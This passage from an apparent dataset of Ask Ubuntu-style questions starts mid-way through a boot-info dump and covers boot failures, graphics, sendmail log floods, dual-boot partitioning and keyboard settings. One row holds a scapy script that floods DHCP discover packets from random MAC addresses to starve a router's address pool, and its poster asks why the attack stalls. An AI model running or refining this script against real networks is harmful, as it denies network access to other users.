: location of files loaded by grub : ==================== gib - gb file fragment ( s ) 163.409683228 = 175.459811328 boot/grub/core.img 1 160.004222870 = 171.803226112 boot/grub/grub.cfg 1 156.344421387 = 167.873544192 boot/initrd.img-3.5.0-23-generic 1 181.418338776 = 194.796457984 boot/vmlinuz-3.5.0-23-generic 1 156.344421387 = 167.873544192 initrd.img 1 181.418338776 = 194.796457984 vmlinuz 1 =================== sdb2 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 0.313095093 = 0.336183296 boot/grub/core.img 2 =============================== stderr messages : =============================== xz : ( stdin ) : compressed data is corrupt xz : ( stdin ) : compressed data is corrupt so how do i go about it now . are they any grievous mistakes ? well any help would be greatly appreciated & honored ... . regards user
403818	ubuntu 13.10 installed but very slow and has graphics problems	i did a new install on my brand new multi-boot computer . ubuntu is very slow , sometimes taking more than 10 seconds to register a single keystroke . the mouse also leaves trails over the screen and erases whatever graphics are behind it . i installed linux mint petra mate on another partition , and had the same problem . windows 7 works perfectly on this machine though . the computer 's specs are : • cpu : intel haswell core i5 4570 3.2ghz • ram : 8gb ddr3 1600mhz • motherboard : gigabyte ga-b85m-hd3 • hard drive : wd 1tb 7200rpm blue with multiple partitions • graphics card : gigabyte geforce 210 i would very much appreciate any assistance that can be provided .
403819	ctrl+alt+t not working	i 'm using ubuntu 12.04 , and till day before yesterday , the shortcut was working perfectly . but when today i pressed it , it did n't open terminal . the terminal app still works . i am on gnome3 3.4.2 , and i updated recently using apt-get install gnome-shell the keyboard shortcuts window shows no problem - pls . help , what should i do now ?
403824	installing ubuntu alongside windows 7 , installer ignores one of the logical drives	on my pc , where i want to install ubuntu 12.04 alongside existing windows 7 , there is a single physical drive consisting of : system reserved / 100 mb ntfs / system , active , primary partition c : / 117 gb ntfs / boot , page file , crash dump , primary partition d : / 180 gb ntfs / primary partition d : partition is empty and this is where i want to install ubuntu . however , when i select `` install ubuntu alongside windows 7 '' in the installer , there is a single proposed drive : scs1 ( 0,0,0 ) ( sda ) that has a size of 190.8 gb , which i can divide in two between windows 7 and ubuntu . do these 190.8 gb correspond to the d : drive ? if so , why do i have to divide it ? as i 've already crashed my os in the past trying to install a second os , i want to be sure of what i 'm doing , hence i ask : what should i do to install ubuntu to the d : partition and allocate d : partition entirely to ubuntu ?
403827	how to copy and paste in terminal using keyboard ?	ctrl + c prints ^c in terminal and does not work . it is same for ctrl + v ( ^v ) . is there any workaround ?
403831	how to fix this error : `` e : some index files failed to download . they have been ignored , or old ones used instead '' ?	when i try to run the following command in ubuntu 13.04 : sudo apt-get update i got following error : w : failed to fetch http : //ppa.launchpad.net/upubuntu- com/xampp/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead
403832	about ubuntu operating system details in dell 15 3521 laptop	i have purchased new dell 15 3521 pentium dual core 3rd generation laptop having operating system ubuntu . i am unable to see information about system properties like installed memory ( ram ) , processor etc . kindly help not able to view webcam & has 1.0mp , is there any software needs to install/download or can view directly . what is the latest ubuntu operating system available now . please give answer . thank you , srinath
403833	why is fresh install of 13.10 not bootable ?	my surface pro insists on booting into the efi settings menu ( black screen , white text , with only the `` secure boot '' and `` tpm options ) after installing 13.10 no matter what i do , and it seems like i must 've tried about a hundred different things for several days straight now . i have waffled back and forth between restoring windows 8 and ubuntu on this machine , but now i am just wanting to wipe out any trace of windows and run ubuntu solely , and natively . interestingly , ubuntu installed fine the first time around but after waffling back to windows 8 the first time , ubuntu will not install again or more accurately , will not boot after installing . i am installing ubuntu 13.10 64-bit desktop edition from thumb bootable thumbdrive which i created using unetbootin . i definitely definitely have secure boot disabled . i can boot to the `` live '' usb stick just fine , and the installation appears to proceed properly all the way to the point where am restarting and am prompted to remove the bootable media . i have gone so far as to delete all partitions from surface 's internal ssd and even to create an `` msdos '' partition table ( as gparted calls it , i 'm assuming is synonymous with `` mbr ) just to ensure that no gpt relics remain . the ubuntu installer seems to recreate partition table as gpt with individual partitions as it sees fit . here is my boot-repair paste : http : //paste.ubuntu.com/6731471/ in this latest attempt , i 've tried to create an encrypted main partition , but i 've tried both ways a total of 20-30 times and have the same problem regardless . also , the boot-repair paste shows that `` = > no boot loader is installed in the mbr of /dev/sda '' but in this latest iteration boot-repair 's advanced options do not show the option to repair the boot sector or mbr . i do n't know why . i have seen those options in the past but using them did not fix the problem . the surface just boots back into the efi options black and white screen no matter what . also i might add that i 've tried boot-repair 's `` recommended repair '' about a dozen times , but to no avail . any help anyone could provide is most appreciated . please do n't send me back to windows land ! i would much rather get ubuntu running natively rather than within an vm .
403836	thunar rabbitvcs - missing emblems	i am running desktop ubuntu 12.04 64bit and have installed rabbitvcs-thunar ( through this tutorial ) . the context menu to perform rabbitvcs operations is working , but the most important feature , status emblems is not . i have none of the visual indicators showing me if a file is changed as shown below when comparing thunar ( left ) against nautilus ( right ) in the same folder . i started thunar with debug output to see if anything had gone wrong , but it does n't appear to be the case . stuart @ office-tower : $ thunarx_python_debug=all thunar thunar_extension_initialize : entered thunarx_python_load_dir : entered dirname=/usr/share/thunarx-python/extensions thunarx_python_init_python : entered thunarx-python : g_module_open /usr/lib/libpython2.7.so.1.0 thunarx-python : py_initialize thunarx-python : pysys_setargv thunarx-python : sanitizing python sys.path thunarx-python : pygtk.require ( `` 2.0 '' ) thunarx-python : init_pygobject thunarx-python : init_pygtk thunarx-python : pyg_enable_threads thunarx-python : sys.path.insert ( 0 , ... ) thunarx-python : import thunarx thunarx_python_object_get_type : entered type=rabbitvcs thunarx-python : python modules loaded thunarx_python_load_dir : entered dirname=/home/stuart/.local/share/thunarx-python/extensions thunarx_python_load_dir : entered dirname=/usr/lib/x86_64-linux-gnu/thunarx-2/python thunar_extension_list_types : entered please note that i already know that this question is very similar to : thunar does n't show any rabbitvcs emblems . however , this is for ubuntu and not xubuntu and i have the strong impression that this may be lead to the cause of the problem and require a different solution .
403840	purple screen after clean install	i 've been trying to install ubuntu for awhile now , and have been pretty much 100 % unsuccessful , aside from the livecd portion of it . so my issue is this : i successfully reach the grub menu , but choosing anything related to ubuntu at that point simply causes a purple screen . i tried to launch it in recovery mode , and it ended up with the same screen . i edited the startup commands for the main boot option and replaced `` quiet splash '' with nomodeset , changed the $ linuxgfxmode to nomodeset , and pretty much tried everything , but i can not in any way get ubuntu to boot . i have an amd a8-4500m apu with radeon ( tm ) hd graphics x 4 . the boot-repair program said something about the efi settings , and that i was in legacy mode . what does this mean ? is it a problem with the installation ? i have no real idea of what to do . any and all help would be appreciated .
403845	ubuntu 13.10 : i still hear sound from laptop speakers when headphones connected	when i connect headphones to laptop with 13.10 i hear sound from speakers and from headphones at same time . how to fix this ? 64bit , lenovo y570
403846	video card does not switch	root @ max-a15w8 : ~ # lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processorfamily integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 640m ] ( rev a1 ) root @ max-a15w8 : ~ # sudo echo dis > /sys/kernel/debug/vgaswitcheroo/switch root @ max-a15w8 : ~ # sudo cat /sys/kernel/debug/vgaswitcheroo/switch 0 : dis : : pwr:0000:01:00.0 1 : igd : + : pwr:0000:00:02.0
403847	who is sm-msp-queue and how does he/she/it flood my /var/log/syslog ?	i run linux beagleboard-xm 3.12.5-armv7-x10 # 1 smp fri dec 13 03:06:20 utc 2013 armv7l armv7l armv7l gnu/linux and my /var/log/syslog gets flooded by messages like jan 11 10:21:09 beagleboard-xm sm-msp-queue [ 8036 ] : s0aj66sy002027 : to=root , ctladdr=root ( 0/0 ) , delay=14:15:03 , xdelay=00:00:00 , mailer=relay , pri=2011764 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=4.0.0 , stat=deferred : connection refused by [ 127.0.0.1 ] . as i dropped sendmail by apt-get remove sendmail and even rebooted i was very surprised . i checked the processes to make sure that sendmail does not run : f uid pid ppid pri ni vsz rss wchan stat tty time command 4 0 1 0 20 0 2996 1936 poll_s ss ? 0:08 /sbin/init 1 0 2 0 20 0 0 0 kthrea s ? 0:00 [ kthreadd ] 1 0 3 2 20 0 0 0 smpboo s ? 0:00 [ ksoftirqd/0 ] 1 0 4 2 20 0 0 0 worker s ? 0:00 [ kworker/0:0 ] 1 0 5 2 0 -20 0 0 worker s < ? 0:00 [ kworker/0:0h ] 1 0 6 2 20 0 0 0 worker s ? 0:00 [ kworker/u2:0 ] 1 0 7 2 -100 - 0 0 smpboo s ? 0:00 [ migration/0 ] 1 0 8 2 20 0 0 0 rcu_gp s ? 0:00 [ rcu_bh ] 1 0 9 2 20 0 0 0 rcu_gp s ? 0:01 [ rcu_sched ] 1 0 10 2 0 -20 0 0 rescue s < ? 0:00 [ khelper ] 5 0 11 2 20 0 0 0 devtmp s ? 0:00 [ kdevtmpfs ] 1 0 12 2 0 -20 0 0 rescue s < ? 0:00 [ netns ] 1 0 13 2 0 -20 0 0 rescue s < ? 0:00 [ writeback ] 1 0 15 2 0 -20 0 0 rescue s < ? 0:00 [ kintegrityd ] 1 0 16 2 0 -20 0 0 rescue s < ? 0:00 [ bioset ] 1 0 17 2 0 -20 0 0 rescue s < ? 0:00 [ kblockd ] 1 0 18 2 0 -20 0 0 rescue s < ? 0:00 [ ata_sff ] 1 0 19 2 20 0 0 0 hub_th s ? 0:00 [ khubd ] 1 0 20 2 -51 - 0 0 irq_th s ? 0:00 [ irq/72-i2c.10 ] 1 0 21 2 20 0 0 0 worker s ? 0:00 [ kworker/u2:1 ] 1 0 24 2 -51 - 0 0 irq_th s ? 0:00 [ irq/73-i2c.11 ] 1 0 25 2 -51 - 0 0 irq_th s ? 0:00 [ irq/77-i2c.12 ] 1 0 28 2 0 -20 0 0 rescue s < ? 0:00 [ edac-poller ] 1 0 29 2 0 -20 0 0 rescue s < ? 0:00 [ devfreq_wq ] 1 0 30 2 0 -20 0 0 rescue s < ? 0:00 [ rpciod ] 1 0 31 2 20 0 0 0 watchd s ? 0:00 [ khungtaskd ] 1 0 32 2 20 0 0 0 kswapd s ? 0:00 [ kswapd0 ] 1 0 33 2 20 0 0 0 fsnoti s ? 0:00 [ fsnotify_mark ] 1 0 34 2 0 -20 0 0 rescue s < ? 0:00 [ nfsiod ] 1 0 35 2 0 -20 0 0 rescue s < ? 0:00 [ bioset ] 1 0 36 2 0 -20 0 0 rescue s < ? 0:00 [ crypto ] 1 0 47 2 0 -20 0 0 rescue s < ? 0:00 [ kthrotld ] 1 0 48 2 0 -20 0 0 rescue s < ? 0:00 [ omap uart0 ] 1 0 49 2 0 -20 0 0 rescue s < ? 0:00 [ omap uart1 ] 1 0 50 2 0 -20 0 0 rescue s < ? 0:00 [ omap uart2 ] 1 0 51 2 0 -20 0 0 rescue s < ? 0:00 [ omap uart3 ] 1 0 52 2 -51 - 0 0 irq_th s ? 0:00 [ irq/23-twl4030- ] 1 0 53 2 20 0 0 0 kthrea s ? 0:00 [ spi1 ] 1 0 54 2 20 0 0 0 kthrea s ? 0:00 [ spi2 ] 1 0 55 2 20 0 0 0 kthrea s ? 0:00 [ spi3 ] 1 0 56 2 20 0 0 0 kthrea s ? 0:00 [ spi4 ] 1 0 57 2 0 -20 0 0 rescue s < ? 0:00 [ binder ] 1 0 58 2 20 0 0 0 mmc_qu s ? 0:01 [ mmcqd/0 ] 1 0 59 2 0 -20 0 0 rescue s < ? 0:00 [ deferwq ] 1 0 102 2 0 -20 0 0 worker s < ? 0:00 [ kworker/0:1h ] 1 0 116 2 20 0 0 0 kjourn s ? 0:00 [ jbd2/mmcblk0p2- ] 1 0 117 2 0 -20 0 0 rescue s < ? 0:00 [ ext4-rsv-conver ] 1 0 267 1 20 0 2480 1172 poll_s s ? 0:02 upstart-udev-bridge -- daemon 5 0 272 1 20 0 9932 1504 sys_ep ss ? 0:00 /lib/systemd/systemd-udevd -- daemon 5 102 327 1 20 0 3112 1256 sys_ep ss ? 0:01 dbus-daemon -- system -- fork 5 0 342 1 20 0 3224 1256 poll_s ss ? 0:00 /usr/sbin/bluetoothd 4 0 348 1 20 0 3052 1288 sys_ep ss ? 0:00 /lib/systemd/systemd-logind 5 0 359 2 10 -10 0 0 rfcomm s < ? 0:00 [ krfcommd ] 5 101 361 1 20 0 29332 1164 poll_s sl ? 0:00 rsyslogd -c5 5 104 368 1 20 0 2692 1128 poll_s s ? 0:00 avahi-daemon : running [ beagleboard-xm.local ] 1 104 369 368 20 0 2692 356 unix_s s ? 0:00 avahi-daemon : chroot helper 4 0 386 1 20 0 6428 2432 sys_ep ss ? 0:00 /usr/sbin/cupsd -f 4 0 405 1 20 0 6704 2264 poll_s ss ? 0:00 /usr/sbin/cups-browsed 4 0 548 1 20 0 3368 712 n_tty_ ss+ tty4 0:00 /sbin/getty -8 38400 tty4 4 0 550 1 20 0 3368 712 n_tty_ ss+ tty5 0:00 /sbin/getty -8 38400 tty5 4 0 560 1 20 0 3368 712 n_tty_ ss+ tty2 0:00 /sbin/getty -8 38400 tty2 4 0 562 1 20 0 3368 712 n_tty_ ss+ tty3 0:00 /sbin/getty -8 38400 tty3 4 0 568 1 20 0 3368 712 n_tty_ ss+ tty6 0:00 /sbin/getty -8 38400 tty6 4 0 621 1 20 0 24992 2400 poll_s ssl ? 0:00 gdm 1 0 622 1 20 0 2324 824 hrtime ss ? 0:00 cron 4 0 681 621 20 0 34496 2996 poll_s sl ? 0:00 /usr/lib/gdm/gdm-simple-slave -- display-id /org/gnome/displaymanager/displays/_0 4 0 704 681 20 0 18620 9276 poll_s ss+ tty7 0:00 /usr/bin/x :0 -background none -verbose -auth /var/run/gdm/auth-for-gdm-u58lks/database -seat seat0 -nolisten tcp vt7 4 0 707 1 20 0 32604 3040 poll_s sl ? 0:00 /usr/lib/accountsservice/accounts-daemon 4 0 713 1 20 0 32548 3540 poll_s sl ? 0:00 /usr/lib/policykit-1/polkitd -- no-debug 1 0 717 2 20 0 0 0 worker s ? 0:00 [ kworker/0:2 ] 4 0 765 681 20 0 27592 3528 poll_s sl ? 0:00 gdm-session-worker [ pam/gdm-launch-environment ] 1 0 779 1 20 0 2452 988 poll_s s ? 0:00 upstart-socket-bridge -- daemon 1 0 783 1 20 0 2884 1416 poll_s s ? 0:00 upstart-file-bridge -- daemon 1 0 801 2 20 0 0 0 kaudit s ? 0:00 [ kauditd ] 1 0 818 1 20 0 3968 2100 poll_s ss ? 0:00 dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0 4 0 914 1 20 0 5592 2060 poll_s ss ? 0:00 /usr/sbin/sshd -d 4 111 938 765 20 0 18472 4608 poll_s ss ? 0:00 /usr/bin/gnome-session -- autostart /usr/share/gdm/greeter/autostart 1 111 944 1 20 0 2776 488 poll_s s ? 0:00 /usr/bin/dbus-launch -- exit-with-session /usr/bin/gnome-session -- autostart /usr/share/gdm/greeter/autostart 4 0 964 1 20 0 6452 2904 poll_s ss ? 0:00 /usr/sbin/modem-manager 1 111 967 1 20 0 2856 872 sys_ep ss ? 0:00 //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session 1 0 971 1 20 0 7268 3220 poll_s ss ? 0:01 /usr/sbin/apache2 -k start 5 0 990 1 20 0 39240 5168 poll_s ssl ? 0:00 networkmanager 0 111 995 1 20 0 40488 2728 poll_s sl ? 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher 0 111 1003 995 20 0 2748 1272 sys_ep s ? 0:00 /bin/dbus-daemon -- config-file=/etc/at-spi2/accessibility.conf -- nofork -- print-address 3 0 111 1010 1 20 0 15212 2484 poll_s sl ? 0:00 /usr/lib/at-spi2-core/at-spi2-registryd -- use-gnome-session 5 33 1020 971 20 0 230948 2896 pipe_w sl ? 0:00 /usr/sbin/apache2 -k start 5 33 1021 971 20 0 230756 2588 pipe_w sl ? 0:00 /usr/sbin/apache2 -k start 4 0 1166 1 20 0 3368 712 n_tty_ ss+ tty1 0:00 /sbin/getty -8 38400 tty1 4 0 1167 1 20 0 1616 640 n_tty_ ss+ ttyo2 0:00 /sbin/getty 115200 ttyo2 4 0 1198 914 20 0 9136 2908 poll_s ss ? 0:00 sshd : ubuntu [ priv ] 5 1000 1210 1198 20 0 9268 1596 poll_s s ? 0:00 sshd : ubuntu @ pts/2 0 1000 1211 1210 20 0 5344 2780 wait ss pts/2 0:00 -bash 4 0 1235 1211 20 0 4968 1368 wait s pts/2 0:00 su 4 0 1236 1235 20 0 4220 1652 wait s pts/2 0:00 bash there was ( is ) neither sendmail nor another mta , right ? my last idea : cron might try to send mails . i switched off cron 's mailing by setting mailto= '' '' , my crontab looks like this # /etc/crontab : system-wide crontab # unlike any other crontab you do n't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d . these files also have username fields , # that none of the other crontabs do . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin mailto= '' '' # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) # 5 */2 * * * root /root/ddclient-3.7.3.bash 15 */2 * * * ubuntu /home/ubuntu/public_html/testprovider/testhosts.bash 0 */4 * * * ubuntu /home/ubuntu/public_html/testprovider/evalhosts.bash */10 * * * * connectx /home/connectx/public_html/startservers.bash continued silly windows-manners , rebooted but still - sm-msp-queue floods syslog and mail.log . what can i do to get rid of these messages ? after receiving the first answer ( many thanks ! ) i checked these suggestions : mta is not started ? obviously not and just as i want it not to : telnet localhost 25 trying 127.0.0.1 ... telnet : unable to connect to remote host : connection refused the question remains : who tries to feed that mail-queue and produces these error-messages ? sending too many emails ? if so : who can it be now ? someone frequently ( every 20 minutes ) tries to send mail : jan 11 12:20:04 beagleboard-xm sendmail [ 2136 ] : my unqualified host name ( beagleboard-xm ) unknown ; sleeping for retry jan 11 12:21:04 beagleboard-xm sendmail [ 2136 ] : unable to qualify my own domain name ( beagleboard-xm ) -- using short name jan 11 12:21:04 beagleboard-xm sendmail [ 2136 ] : s0bbl4ju002136 : from=smmsp , size=417 , class=0 , nrcpts=1 , msgid= < 201401111121.s0bbl4ju002136 @ beagleboard-xm > , relay=smmsp @ localhost jan 11 12:21:04 beagleboard-xm sendmail [ 2136 ] : s0bbl4ju002136 : to=root , ctladdr=smmsp ( 113/122 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=30417 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=4.0.0 , stat=deferred : connection refused by [ 127.0.0.1 ] jan 11 12:40:04 beagleboard-xm sendmail [ 2225 ] : my unqualified host name ( beagleboard-xm ) unknown ; sleeping for retry jan 11 12:41:04 beagleboard-xm sendmail [ 2225 ] : unable to qualify my own domain name ( beagleboard-xm ) -- using short name jan 11 12:41:04 beagleboard-xm sendmail [ 2225 ] : s0bbf4az002225 : from=smmsp , size=417 , class=0 , nrcpts=1 , msgid= < 201401111141.s0bbf4az002225 @ beagleboard-xm > , relay=smmsp @ localhost jan 11 12:41:04 beagleboard-xm sendmail [ 2225 ] : s0bbf4az002225 : to=root , ctladdr=smmsp ( 113/122 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=30417 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=4.0.0 , stat=deferred : connection refused by [ 127.0.0.1 ] jan 11 13:00:03 beagleboard-xm sendmail [ 2740 ] : my unqualified host name ( beagleboard-xm ) unknown ; sleeping for retry jan 11 13:01:03 beagleboard-xm sendmail [ 2740 ] : unable to qualify my own domain name ( beagleboard-xm ) -- using short name jan 11 13:01:03 beagleboard-xm sendmail [ 2740 ] : s0bc13pa002740 : from=smmsp , size=417 , class=0 , nrcpts=1 , msgid= < 201401111201.s0bc13pa002740 @ beagleboard-xm > , relay=smmsp @ localhost jan 11 13:01:03 beagleboard-xm sendmail [ 2740 ] : s0bc13pa002740 : to=root , ctladdr=smmsp ( 113/122 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=30417 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=4.0.0 , stat=deferred : connection refused by [ 127.0.0.1 ] jan 11 13:20:04 beagleboard-xm sendmail [ 2832 ] : my unqualified host name ( beagleboard-xm ) unknown ; sleeping for retry jan 11 13:21:04 beagleboard-xm sendmail [ 2832 ] : unable to qualify my own domain name ( beagleboard-xm ) -- using short name jan 11 13:21:04 beagleboard-xm sendmail [ 2832 ] : s0bcl4v0002832 : from=smmsp , size=417 , class=0 , nrcpts=1 , msgid= < 201401111221.s0bcl4v0002832 @ beagleboard-xm > , relay=smmsp @ localhost jan 11 13:21:04 beagleboard-xm sendmail [ 2832 ] : s0bcl4v0002832 : to=root , ctladdr=smmsp ( 113/122 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=30417 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=4.0.0 , stat=deferred : connection refused by [ 127.0.0.1 ] the only candidate – to my mind – still is cron that should not do so for crontab provides an empty address that should keep cron from mailing . mail server is being used to send out spam ? well – that would be worst case i try to prevent by not operating any mta . unfortunately i can not guarantee that the system is not abused but it is rather unlikely as i freshly set up that beagleboard and use dedicated portforwarding on the router . the router does not forward other ports than ssh / http / https and ten dedicated ports ( 4753 - 4762 ) for my java-application .
403848	recent items missing zeitgeist	i want to delete history and disable recent items recording . so i went to zeitgeist options , but there is no recent items or files tab only 'security ' , 'search ' and 'diagnostics ' tab . but in my guest session there is files and folders tab , but in user session its missing please help important .
403850	files missing on ntfs partition	i have the following setup samsung series 5 ultrabook , i5 ( 3rd gen ) , 1tb hd + 250gb ssd , nvidia 620m graphics card with optimus , windows 8.1 ( single lang ) , ubuntu 13.10 64 bit . i have three primary partitions on my disk : 1.windows partition 2.ubuntu partition 3.a common data partition ( ntfs ) files i save to the 3rd partition on ubuntu are missing when i log onto windows . chkdsk detects disk errors but is unable to recover all the files . i have disable fast boot ( power options ) , secure boot and hibernation . i have also tried dismounting the partition on shutting down windows and re-mounting after it starts . none of these strategies help ; i am still lose files saved on the shred partition when i log onto windows . i am looking for a strategy which would allow me share data between windows and linux ( bidirectional ) without using an external drive or online storage facility . thanks .
403851	after installing the linux ubuntu , my windows desktop does n't change at all ?	after installing the linux ubuntu , my windows desktop and the system does n't change at all and it is still the same as usual . can anyone tell me how to be the same as the one shown on website ? did i have anything wrong during the installation ?
403853	setxkbmap incompatible options	i try to configure my desired keyboard combination using setxkbmap but it seems some options are not compatible , because when i pass my desired options one of them has no affect . i want both shifts to toggle caps lock , caps lock key as alt+gr and alt+shift to switch layouts . i was not able to have all together working while they work when i try them one by one . can anybody give me the correct command ? this is the command that i have used : setxkbmap -layout de , us , ir -option `` lv3 : caps_switch '' -option `` shift : both_capslock '' -option `` grp : alt_shift_toggle ''
403854	where can i find an iso file to be burned on usb ?	i want to creat abootable usb flash but ca n't find an iso file- pls.help me where to find this file so as to get start whith your fine software best regards
403857	installing the ubuntu server in ubuntu	my first question is q - 1 ) how to install ubuntu server 13.10 in ubuntu 13.10 ? q - 2 ) what are the uses of this server and where can we find a manual wherein we can get a complete detail regarding the use of this server with some example ?
403859	how to control lightdm power saving preferences ?	i want lightdm to enter power save after a specific period of time . if i 'm logged in then my screen will time out as per the user settings , however when no one is logged in the screen will stay on forever . i 've looked at some posts that make some suggestions on what to do , but none of them seem to work or it 's down to my limited knowledge of linux . updated 6/2/2014 : the settings shown by sudo -h -u lightdm dbus-launch -- exit-with-session gsettings list-recursively org.gnome.settings-daemon.plugins.power are as follows : org.gnome.settings-daemon.plugins.power active true org.gnome.settings-daemon.plugins.power button-hibernate 'hibernate' org.gnome.settings-daemon.plugins.power button-power 'interactive' org.gnome.settings-daemon.plugins.power button-sleep 'suspend' org.gnome.settings-daemon.plugins.power button-suspend 'suspend' org.gnome.settings-daemon.plugins.power critical-battery-action 'suspend' org.gnome.settings-daemon.plugins.power idle-brightness 30 org.gnome.settings-daemon.plugins.power idle-dim true org.gnome.settings-daemon.plugins.power lid-close-ac-action 'suspend' org.gnome.settings-daemon.plugins.power lid-close-battery-action 'suspend ' org.gnome.settings-daemon.plugins.power lid-close-suspend-with-external-monitor false org.gnome.settings-daemon.plugins.power notify-perhaps-recall true org.gnome.settings-daemon.plugins.power percentage-action 2 org.gnome.settings-daemon.plugins.power percentage-critical 3 org.gnome.settings-daemon.plugins.power percentage-low 10 org.gnome.settings-daemon.plugins.power priority 0 org.gnome.settings-daemon.plugins.power sleep-inactive-ac-timeout 120 org.gnome.settings-daemon.plugins.power sleep-inactive-ac-type 'suspend ' org.gnome.settings-daemon.plugins.power sleep-inactive-battery-timeout 0 org.gnome.settings-daemon.plugins.power sleep-inactive-battery-type 'suspend ' org.gnome.settings-daemon.plugins.power time-action 120 org.gnome.settings-daemon.plugins.power time-critical 300 org.gnome.settings-daemon.plugins.power time-low 1200 org.gnome.settings-daemon.plugins.power use-time-for-policy true i would have assumed the sleep-inactive-ac-timeout 120 would have been the correct entry , but it does n't time-out unless i 'm actually logged in as a user .
403860	dhcp starvation with scapy ( 12.04 ) only `` starves '' one single address repeatedly	so im running this : conf.checkipaddr = false dhcp_discover=ether ( src=randmac ( ) , dst= '' ff : ff : ff : ff : ff : ff '' ) /ip ( src= '' 0.0.0.0 '' , dst= '' 255.255.255.255 '' ) /udp ( sport=68 , dport=67 ) /bootp ( chaddr=randstring ( 12 , '0123456789abcdef ' ) ) dhcp ( options= [ ( `` message-type '' , '' discover '' ) , '' end '' ] ) sendp ( dhcp_discover , loop=1 ) in scapy on my home router and it somewhat works , the leased address are 192.168.1.100-192.168.1.104 and so when i sendp i see three new leases for 105 , 106 , 107. but after that my laptop either loses connection , or i keep getting new leases for the above 3 ip 's , but it does not keep going for 108+ . i was wondering why this happens and if i can prevent it somehow ? ty .
403861	is there any application that will auto update hosts file from web ?	is there any application like hostman for ubuntu ? i need an application that will auto update hosts file from web .
403870	windows 8 not recognised when installing ubuntu 13.10	i recently got a laptop that came pre-installed with windows 8 . i would also like to run linux , but i do not want to remove windows , as many of the programs i use for school are only windows-compatible . i successfully booted using a usb into 'try ubuntu ' , but when i went to install the only options were to overwrite windows or 'something else ' - it said no other operating system was detected . i did some research into partitioning , but the guides all said to back up a windows image ( or something like that ) in case something went wrong . however , i do n't have any way of backing up ( all my usb sticks are < 4gb ) . so i have a few questions : how do i solve the issue with windows 8 not being recognised ? using the built-in ubuntu 'install alongside ' would be so much easier than partitioning myself ( i really do n't want to mess anything up ) how big are windows image backups ? if they are < 4gb i can use my usb stick and feasibly partition myself .
403873	running glmark2 with discrete graphics card : 60 fps cap	i wanted to verify that my nvidia discrete graphics card was functioning appropriately with bumblebee installed , in comparison to the intel integrated graphics card . so , i ran glmark2 and optirun glmark2 , but for each new animation/test/whatever that glmark2 ran , the nvidia discrete graphics card ( with optirun ) would not produce higher than 60 fps ( in fact , it produces 60 fps every single time ) . it also produced the following each time a new fps line was displayed : ** glx does not support glx_ext_swap_control or glx_mesa_swap_control ! ** failed to set swap interval . results may be bounded above by refresh rate . the intel integrated card ( no optirun - i realize this is redundant ) generally produced fps figures of about 1200 on average , and produced no messages like those shown above . it 's not that big of a deal to get the numbers to go over 60 for the nvidia card , since the monitor ca n't do over 60fps anyways according to xrandr , but it 'd just be interesting to know why those messages are produced and how that could be avoided , to see what sort of numbers the nvidia card can rack up compared to the intel card . but like i said it 's not that big of a deal to get that figured out since bumblebee is clearly working quite nicely with the nvidia card , since the cpu barely even budges running through those tests with that card ! that , and the quality produced for certain animations from the glmark2 test is enormously better when it runs through the discrete nvidia card compared to the integrated intel card . thanks for any input you may have !
403875	can not read jpeg files on cd	i have upgraded my wife 's hp pavillion g series laptop to 13.10 when a cd is installed with jpeg photos it can not read them or download them ... also will not play audio cds - no issues with videos , and yes done all the restricted extras add-ons . message : '' 67 photos failed to import because the photo library folder was not writable : /media/cdrom/photo-folder jpegs/25.12.2013.jpeg '' technical stuff : intel ( r ) pentium ( r ) cpu b960 x86_64 ubuntu 13.10 saucy xubuntu
403877	one solution to black screen with flashing cursor on reboot in 12.04 lts	this is more of an answer than a question but i did not have enough reputation points to add something to the following post : my computer boots to a black screen , what options do i have to fix it ? i am running ubuntu 12.04 lts on a hp n40l microserver and after a couple of months i started getting a black screen with flashing cursor everytime i rebooted . when looking in the bios i noticed that for some reason my boot priority was being changed and the main drive was sitting further down in the boot priority . i reset the boot priority with my main drive sitting at the top and the system rebooted fine . however , the boot priority did not stick and i was facing the black screen with flashing cursor on the next reboot . next time in the bios i noticed that there was another setting `` usb device boot priority '' and this was set to high . i set this to low and have not had any problems since . each reboot has rebooted flawlessly back to the login screen with no black screens or flashing cursors . i just thought i would add this in case this is a possible solution for anyone who is in the same boat and was tearing their hair out like i was - hope it is helpful . brad .
403880	help me to handle 'user account ' in ubuntu 13.10	short story about my trials and problems ( hangup ) to add a new user in ubuntu 13.10 gui-window . i need help to handle 'user account ' in saucysalamander . want to add a new user ( to the same group ) with the , the window “system settings” gui . the gui.“system settings” appear and i can chose between settings like . * personal * hardware , and * system on the right side one can see - “user account” , appear . a while after i mouse click , on “user account” , the whole gui-window “system settings” 'hang up ' , and after 10-20 seconds are shaded . the window “system settings” is not responding . clicked on “force quit” to finish . please help me with this , so i can do some simple sudo with the gui – since i 'm not familiar with unix/linux . /tebbot
